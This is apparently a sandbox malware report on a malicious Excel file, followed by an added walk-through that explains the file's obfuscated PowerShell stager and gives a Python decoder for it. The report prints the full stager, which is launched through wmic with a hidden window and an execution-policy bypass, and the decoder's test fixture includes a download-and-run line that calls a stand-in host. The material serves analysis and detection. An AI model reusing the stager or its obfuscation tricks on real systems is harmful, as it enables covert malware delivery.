Analysis

Max time kernel: 135s
Max time network: 126s
Platform: windows10_x64
Resource: win10
Submitted: 13-07-2020 23:03

Static task: static1
Behavioral task: behavioral1 (sample Office365_155649.xls, resource win7v200430)
Behavioral task: behavioral2 (sample Office365_155649.xls, resource win10)
General

Target: Office365_155649.xls
Size: 65KB
MD5: ad99acf449d38ae16688948601ac1c48
SHA1: aca7300bbd57be32427a1b69ab7ab9792d4d7efe
SHA256: 478b989b58015300f188b4d6459d08d61edef08730fdc2256601cddd7b98ebb3
SHA512: 9893e23ce9856eb086992d3ccbce7a673b0cbab171eeac991034eb5ac3f5d6f735e1f49a767e05dc77c1b09a3a66f161add8d2921895bf783e5b64e18057a635
Malware Config
Signatures

Suspicious use of WriteProcessMemory (4 IoCs)
Processes:
  PID 2728 (EXCEL.EXE) wrote to memory of PID 728 (wmic.exe)
  PID 2728 (EXCEL.EXE) wrote to memory of PID 728 (wmic.exe)
  PID 2220 (pOwershElL.exe) wrote to memory of PID 1508 (regsvr32.exe)
  PID 2220 (pOwershElL.exe) wrote to memory of PID 1508 (regsvr32.exe)

Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes:
  PID 2220 (pOwershElL.exe), recorded 3 times

Blacklisted process makes network request (1 IoC)
Processes:
  flow 20: PID 2220 (pOwershElL.exe)

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (EXCEL.EXE)

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (EXCEL.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (EXCEL.EXE)

Suspicious use of SetWindowsHookEx (10 IoCs)
Processes:
  PID 2728 (EXCEL.EXE), recorded 10 times

Process spawned unexpected child process (2 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process: PID 728 (wmic.exe), parent PID 2728 (EXCEL.EXE)
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process: PID 2220 (pOwershElL.exe), parent PID 1656

Suspicious use of AdjustPrivilegeToken (43 IoCs)
Processes:
  PID 728 (wmic.exe), each of the following recorded twice: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  PID 2220 (pOwershElL.exe): SeDebugPrivilege

Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
  PID 2728 (EXCEL.EXE)
Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (PID 2728)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Office365_155649.xls"
  - Suspicious use of WriteProcessMemory
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious use of SetWindowsHookEx
  - Suspicious behavior: AddClipboardFormatListener

  C:\Windows\System32\Wbem\wmic.exe (PID 728, child of EXCEL.EXE)
    Command line: wmic pROcesS call CREATE "pOwershElL -noproF -NOniNTER -Win 01 -ExeCUTIoNpOL byPasS iex("\"&('s'+'al') ('utf-'+'8') ('New'+'-Obje'+'ct');& ( `${S`H`elLid}[1]+`${shEL`l`ID}[13]+'X')(.('utf'+'-8') ('i'+'o'+'.STrEa'+'MreA'+'deR')(( &('u'+'tf-8') ('IO.'+'co'+'M'+'PREsS'+'Ion'+'.DE'+'fLAtEST'+'rEam')( [sYsTem.IO.MemorYSTReAm][sYStEM.CONVeRT]::fRomBASE64StRinG( ('bVVrc9o'+'4FP0rDuOt5AJOoE03'+'CcPsEvIoKcmmhYXtUqZ2jCBq/CC2TEJd/fc9VyYkmdkPIKH7'+'Ojr36GIXay/UbcZadpHp9h6WhW43sFxdYd1726Cj2Puh25zlrMpufOZUOZulEj/yiDmteR4HSiaxddnkdtH7qJ3CLjdult9kKpXxglNax6qnYhn6geCszmp2se5r5+Xh4OmwlQqVp7FlF9+1flHgE/KMkV/O+Q5/w9lQZKoOHN0EX3EsyI12DFm7FD4GhmU'+'oFWe7zJk0p+4wldFpPOPMIp/jfD4X'+'6UD+FFbjA0KSPFZWw'+'6oLH7EDbdXvcymU4xQbPPtAYxeX3icw5hNlay/CNqZ'+'tx+sQRzEBUDIDMXYReF06SyKcWfjsLkWagD9DtzFiCbYYLRM0QB9wt6jJHM5dzhYIfIgk8HI2lvG75veAakRLaoASa'+'bbGJqOqguos02'+'RGlkAxx3HzXM4oqQDM'+'W0VODN1bZkeEBkhKGBO7ONf'+'TanmJKnMDOG0tma4'+'Z87ZRFuPfTop97bCaycH+YAgdDHQLfSHkd0BOJcGwuLf2oYdCeDO67OlLTezVDjbQYJjpKun'+'sgspTOrFlxUXnDADdAhuDko'+'gR8Pv4pNK/CbGKo905DKbCVk8W6ekr9E1lPnrHVGgdaSLBpFohomFVroRyx+KmG0p'+'h'+'395UWrjCo'+'FdW8ZGfRB8KIqzbpFOYczUn2R3QTyQ6LxPVR77jmOiRiQ7wXTlJHuIw8Wcnvr'+'KjuwqAJF7nBKrgk'+'+6tn06mU0o4enUXE22KIWWYi79ix+Wl2wYPPqHYFiEv9LoXr5I7UToSPSZf6TUnLZhcjlO/SGT8zMvQOzsnYsTVyDvyhqeXS9J4JAH'+'RLgB0o8BAGnqN96835ZkgPdVTP54ZQVKN2I/Es1AqbvF'+'e23TpMZUwwVX2jfqLAtRpmFaXZDOsvBoYRncL'+'g3Gp2xMZqymcI/0WsykmjH3vc0db29hURMlKvA687lNuOPp4zEZPbMf0nt6LHxpusswsqVhkK+rCu6Z5hj88qjoUj8o9jYNkBlDTo6O/h2cHzwNp5HVQ76'+'f3D828YkA'+'TYNJN4pVIF'+'XzP0iQ69jPx4f3g6U7/eo8vp9vAp/GWpMIPbmGVSluSzgF7QgNoSmnRnT+5uYx3PaTrrDB03GFC8umkqb82'+'xp4yU2Plm7fX84aog8zYX4QUhNdp0aX6ICJU2Eq4uAFNPDLAqVqlagttVdvWJEDyKZ8cr5UA670h4blAMKbAzWOSPhmuvaUypr7+'+'DW0igGXOqWNG5cobUfHQu+9o98vmXXK'+'KC8vRMq1WdipOraTbPRdqS9U5/hta'+'E5m4cxkKsDlOpRKdMKTKGewPusafL7xa6Veya+7tQXgOUmAm'+'kd8CM42VGn7QjtsX8ULdbqhYon3iEezT483MExRLuDabRiqkj3pmAksHQcI3Dof/h7Av4yeEE6hKPML2NJPMeK9xzr5+/n1GeUFK3+8Ki4PyzpfpwWF1s2lsNvv7Tq3cHTaJqOgOxPwH'))"\"+ 
([ChAR]44).ToStrinG() +"\"[Io.ComprEssion.ComPreSSIoNmODE]::DecOMpREsS))"\"+ ([ChAR]44).ToStrinG() +"\" [SYsteM.tExT.EncODiNg]::AsCII)).REaDtOEnD( )"\")"
    - Process spawned unexpected child process
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\WindowsPowerShell\v1.0\pOwershElL.exe (PID 2220; parent is wmiprvse.exe, PID 1656, which services the WMI process-creation call issued by wmic.exe, so this process is not a child of EXCEL.EXE)
  Command line: pOwershElL -noproF -NOniNTER -Win 01 -ExeCUTIoNpOL byPasS iex("\"&('s'+'al') ('utf-'+'8') ('New'+'-Obje'+'ct');& ( `${S`H`elLid}[1]+`${shEL`l`ID}[13]+'X')(.('utf'+'-8') ('i'+'o'+'.STrEa'+'MreA'+'deR')(( &('u'+'tf-8') ('IO.'+'co'+'M'+'PREsS'+'Ion'+'.DE'+'fLAtEST'+'rEam')( [sYsTem.IO.MemorYSTReAm][sYStEM.CONVeRT]::fRomBASE64StRinG( ('bVVrc9o'+'4FP0rDuOt5AJOoE03'+'CcPsEvIoKcmmhYXtUqZ2jCBq/CC2TEJd/fc9VyYkmdkPIKH7'+'Ojr36GIXay/UbcZadpHp9h6WhW43sFxdYd1726Cj2Puh25zlrMpufOZUOZulEj/yiDmteR4HSiaxddnkdtH7qJ3CLjdult9kKpXxglNax6qnYhn6geCszmp2se5r5+Xh4OmwlQqVp7FlF9+1flHgE/KMkV/O+Q5/w9lQZKoOHN0EX3EsyI12DFm7FD4GhmU'+'oFWe7zJk0p+4wldFpPOPMIp/jfD4X'+'6UD+FFbjA0KSPFZWw'+'6oLH7EDbdXvcymU4xQbPPtAYxeX3icw5hNlay/CNqZ'+'tx+sQRzEBUDIDMXYReF06SyKcWfjsLkWagD9DtzFiCbYYLRM0QB9wt6jJHM5dzhYIfIgk8HI2lvG75veAakRLaoASa'+'bbGJqOqguos02'+'RGlkAxx3HzXM4oqQDM'+'W0VODN1bZkeEBkhKGBO7ONf'+'TanmJKnMDOG0tma4'+'Z87ZRFuPfTop97bCaycH+YAgdDHQLfSHkd0BOJcGwuLf2oYdCeDO67OlLTezVDjbQYJjpKun'+'sgspTOrFlxUXnDADdAhuDko'+'gR8Pv4pNK/CbGKo905DKbCVk8W6ekr9E1lPnrHVGgdaSLBpFohomFVroRyx+KmG0p'+'h'+'395UWrjCo'+'FdW8ZGfRB8KIqzbpFOYczUn2R3QTyQ6LxPVR77jmOiRiQ7wXTlJHuIw8Wcnvr'+'KjuwqAJF7nBKrgk'+'+6tn06mU0o4enUXE22KIWWYi79ix+Wl2wYPPqHYFiEv9LoXr5I7UToSPSZf6TUnLZhcjlO/SGT8zMvQOzsnYsTVyDvyhqeXS9J4JAH'+'RLgB0o8BAGnqN96835ZkgPdVTP54ZQVKN2I/Es1AqbvF'+'e23TpMZUwwVX2jfqLAtRpmFaXZDOsvBoYRncL'+'g3Gp2xMZqymcI/0WsykmjH3vc0db29hURMlKvA687lNuOPp4zEZPbMf0nt6LHxpusswsqVhkK+rCu6Z5hj88qjoUj8o9jYNkBlDTo6O/h2cHzwNp5HVQ76'+'f3D828YkA'+'TYNJN4pVIF'+'XzP0iQ69jPx4f3g6U7/eo8vp9vAp/GWpMIPbmGVSluSzgF7QgNoSmnRnT+5uYx3PaTrrDB03GFC8umkqb82'+'xp4yU2Plm7fX84aog8zYX4QUhNdp0aX6ICJU2Eq4uAFNPDLAqVqlagttVdvWJEDyKZ8cr5UA670h4blAMKbAzWOSPhmuvaUypr7+'+'DW0igGXOqWNG5cobUfHQu+9o98vmXXK'+'KC8vRMq1WdipOraTbPRdqS9U5/hta'+'E5m4cxkKsDlOpRKdMKTKGewPusafL7xa6Veya+7tQXgOUmAm'+'kd8CM42VGn7QjtsX8ULdbqhYon3iEezT483MExRLuDabRiqkj3pmAksHQcI3Dof/h7Av4yeEE6hKPML2NJPMeK9xzr5+/n1GeUFK3+8Ki4PyzpfpwWF1s2lsNvv7Tq3cHTaJqOgOxPwH'))"\"+ 
([ChAR]44).ToStrinG() +"\"[Io.ComprEssion.ComPreSSIoNmODE]::DecOMpREsS))"\"+ ([ChAR]44).ToStrinG() +"\" [SYsteM.tExT.EncODiNg]::AsCII)).REaDtOEnD( )"\")
  - Suspicious use of WriteProcessMemory
  - Suspicious behavior: EnumeratesProcesses
  - Blacklisted process makes network request
  - Process spawned unexpected child process
  - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\regsvr32.exe (PID 1508, child of pOwershElL.exe)
    Command line: "C:\Windows\system32\regsvr32.exe" -s C:\Users\Admin\AppData\Local\Temp\JavaDeployReg.
    (the target file name is cut off in the report as captured)
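Decoding the stager (added analysis and example; not part of the sandbox report). The argument that wmic.exe passes to CREATE is a single PowerShell stager. `-noproF -NOniNTER -Win 01 -ExeCUTIoNpOL byPasS` is `-NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass` (the mixed case and the numeric `01`, the enum value for Hidden, defeat naive string matching). `&('s'+'al') ('utf-'+'8') ('New'+'-Obje'+'ct')` is `Set-Alias utf-8 New-Object`, so every later `.('utf-8') (...)` call is a `New-Object`. `${ShellId}[1]+${ShellId}[13]+'X'` indexes the default `$ShellId` value `Microsoft.PowerShell` to spell `ieX`, so the string "iex" never appears in clear, and the `([ChAR]44).ToStrinG()` pieces supply the commas of the DeflateStream and StreamReader argument lists at run time. The payload is a base64 string split into `'a'+'b'+...` fragments, passed through `[Convert]::FromBase64String`, a `DeflateStream` in Decompress mode and an ASCII `StreamReader`, and the resulting text is invoked. Because `wmic process call create` is executed by WmiPrvSE.exe, the PowerShell process is a child of wmiprvse.exe (PID 1656) rather than of EXCEL.EXE, which is why it sits at the top level of the tree: a rule that only looks for Office-to-PowerShell parent/child pairs misses this chain, while the "Parent wmiprvse.exe is not expected to spawn this process" signature catches it.

The Python below, written for this page and not taken from the report or from any project, reverses that pipeline: it reassembles the fragments, base64-decodes them and raw-inflates the result (wbits=-15, because .NET DeflateStream writes raw DEFLATE without a zlib header). `SAMPLE_SECOND_STAGE` and `build_sample_cmdline` are constructed fixtures so that the script runs offline; the real second stage, which this page does not show, is recovered by passing the CREATE argument from the report to `decode_stager`.

```python
"""Decoder for the PowerShell stager pattern in this report:
'a'+'b'+... fragments -> base64 -> raw DEFLATE -> ASCII script -> iex.
Added example; not code from the sandbox or from the malware."""
import base64
import re
import zlib

# Default $ShellId of powershell.exe. The stager spells "ieX" as
# ${ShellId}[1] + ${ShellId}[13] + 'X' so "iex" never appears literally.
SHELL_ID = "Microsoft.PowerShell"

# ${S`H`elLid}[n] (backticks inside ${...} are PowerShell escape characters
# and carry no meaning here) or a single-quoted literal.
_TOKEN = re.compile(r"\$\{((?:`?[A-Za-z])+)\}\[(\d+)\]|'([^']*)'")

# [Convert]::FromBase64String( ('frag'+'frag'+...) ) in any casing.
_B64_CALL = re.compile(
    r"frombase64string\s*\(\s*\(((?:\s*'[^']*'\s*\+?)+)\)", re.IGNORECASE)
_FRAG = re.compile(r"'([^']*)'")


def resolve_shellid_expr(expr: str) -> str:
    """Evaluate a '+'-joined mix of ${ShellId}[n] indexes and 'literals'."""
    out = []
    for var, idx, lit in _TOKEN.findall(expr):
        if var:
            if var.replace("`", "").lower() != "shellid":
                raise ValueError("unsupported variable ${%s}" % var)
            out.append(SHELL_ID[int(idx)])
        else:
            out.append(lit)
    return "".join(out)


def extract_base64(cmdline: str) -> str:
    """Reassemble the base64 blob that was split into 'a'+'b'+... fragments."""
    m = _B64_CALL.search(cmdline)
    if m is None:
        raise ValueError("no FromBase64String((...)) call found")
    return "".join(_FRAG.findall(m.group(1)))


def decode_stager(cmdline: str) -> str:
    """base64 -> raw DEFLATE (what .NET DeflateStream emits) -> ASCII text."""
    blob = base64.b64decode(extract_base64(cmdline), validate=True)
    # wbits=-15: raw DEFLATE with no zlib header, matching DeflateStream.
    return zlib.decompress(blob, -15).decode("ascii")


# Constructed fixture (not the report's second stage, which this page does
# not show): a one-line downloader that ends in regsvr32 -s, like the chain
# in the process tree. example.invalid never resolves.
SAMPLE_SECOND_STAGE = (
    "$p=$env:TEMP+'\\stage2.bin';"
    "(New-Object Net.WebClient).DownloadFile('http://example.invalid/s',$p);"
    "regsvr32 -s $p"
)


def build_sample_cmdline(script: str, chunk: int = 9) -> str:
    """Wrap `script` the way the stager does, so the decoder can be exercised
    offline: raw DEFLATE, base64, quoted fragments, FromBase64String call."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = comp.compress(script.encode("ascii")) + comp.flush()
    b64 = base64.b64encode(raw).decode("ascii")
    frags = "+".join("'%s'" % b64[i:i + chunk] for i in range(0, len(b64), chunk))
    return (
        "pOwershElL -noproF -NOniNTER -Win 01 -ExeCUTIoNpOL byPasS "
        "& ( `${S`H`elLid}[1]+`${shEL`l`ID}[13]+'X')(.('utf'+'-8') ('io.STrEaMreAdeR')"
        "(( &('utf-8') ('IO.coMPREsSIon.DEfLAtESTrEam')( [sYsTem.IO.MemorYSTReAm]"
        "[sYStEM.CONVeRT]::fRomBASE64StRinG( (" + frags + ")),"
        "[Io.ComprEssion.ComPreSSIoNmODE]::DecOMpREsS)), "
        "[SYsteM.tExT.EncODiNg]::AsCII)).REaDtOEnD( )"
    )


if __name__ == "__main__":
    cmd = build_sample_cmdline(SAMPLE_SECOND_STAGE)
    print("invoked via:", resolve_shellid_expr("`${S`H`elLid}[1]+`${shEL`l`ID}[13]+'X'"))
    print("second stage:", decode_stager(cmd))
```

To decode the real sample, paste the text between `CREATE "` and the closing `"` of the wmic.exe command line into `decode_stager`. If the page's transcription of the blob is incomplete, `base64.b64decode(..., validate=True)` raises `binascii.Error` and `zlib.decompress` raises `zlib.error`; neither silently returns partial output, which is the behaviour you want when the decoded text is about to be treated as an IoC.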